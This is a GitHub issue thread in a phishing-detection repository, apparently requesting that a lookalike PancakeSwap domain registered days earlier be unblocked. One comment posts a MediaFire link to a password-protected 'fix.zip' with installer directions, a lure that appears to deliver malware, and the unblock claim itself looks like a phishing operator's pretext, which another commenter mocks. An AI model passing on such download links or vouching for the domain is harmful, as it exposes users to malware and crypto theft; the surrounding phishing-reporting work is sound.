### ISSUE TITLE
[Legitimate Site Blocked] www.pancakeswap.me

### ISSUE THREAD

**Issue by lokasina** [MetaMask/eth-phishing-detect#79239]
This site is just a unofficial blog of Pancakeswap and other related crypto stuff.

https://www.pancakeswap.me/?__cf_chl_rt_tk=mpT83vSqnnX.We7h4JHqPQH4en86hp_W9CO.vjK8rpA-1724811179-0.0.1.1-5929

**Comment by Vomgnar** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by PanamaPanamera** [comment]
It's registried 2days ago, at the moment till you didin't enable cloaking maybe it's a white page as blog, and the domain name is for sure not to trick users (sarcasm) I think it shouldn't be removed.
